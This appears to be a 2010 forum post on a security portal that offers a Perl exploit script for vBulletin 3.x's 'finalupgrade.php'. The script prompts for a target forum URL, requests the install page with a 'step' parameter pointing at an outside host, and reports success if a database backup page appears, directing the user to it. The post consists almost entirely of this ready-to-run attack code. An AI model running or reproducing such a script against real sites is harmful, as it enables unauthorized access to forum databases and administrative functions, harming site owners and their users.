|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 112
Members: 0
Total: 112
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
vBulletin 3.x.x 'finalupgrade.php' Exploit |
|
Posted: Wed Jul 14, 2010 5:12 pm |
|
|
sEcZx |
Regular user |
|
|
Joined: Jul 09, 2010 |
Posts: 9 |
|
|
|
|
|
|
|
Code: |
#/usr/bin/perl
#codEd by dEmOn | mE
# --
# ---> http://devsn.org <------
## ---=== vBulletin 3.x.x 'finalupgrade.php' Exploit ===--- ##
######################################
## NOTE: This vulnerability is not discovered by me... ##
## So, I take no credit for the vuln,,, ##
## I only Coded the exploit... xD.. Anyway, idk who ##
## discovered this vuln,, So, GJ! :) ##
######################################
# ---> http://devsn.org <------
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)");
print "\n ---=== vBulletin 3.x 'finalupgrade.php' Exploit ===---\n\n";
print "\n===============[x]==================\n";
print " ._. ___________._.\n";
print " | | _____ \\_ _____/| |\n";
print " ______ | |/ \\ | __)_ | | ______\n";
print "/_____/ \\| Y Y \\| \\ \\| /_____/ \n";
print " _|__|_| /_______ / __ \n";
print " \\/ \\/ \\/ \\/\n";
print "\n===============[x]==================\n";
print "\n Enter the forum URL(e.g. http://www.TargetSite.com/vb/ ): ";
$url = <STDIN>;
print "\n\nChecking for vuln..\n";
chomp($url);
my $response = $ua->get($url . 'install/finalupgrade.php?step=http://www.devsn.org');
if ($response->is_success) {
if ($response->content =~ m/vBulletin Database Backup System/gi){
print "\nExploit Success!\n";
print "\n Go TO: " . $url . "install/finalupgrade.php?step=http://www.devsn.org\n";
}
else {
print "\nNot vuln.. Exploit Failed!\n";
}
}
else {
print "\nExploit Failed:";
print "\n" . $response->status_line;
}
print "\n---=== EOF ===---\n";
print "\nhttp://devsn.org\n";
$end = <STDIN>;
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|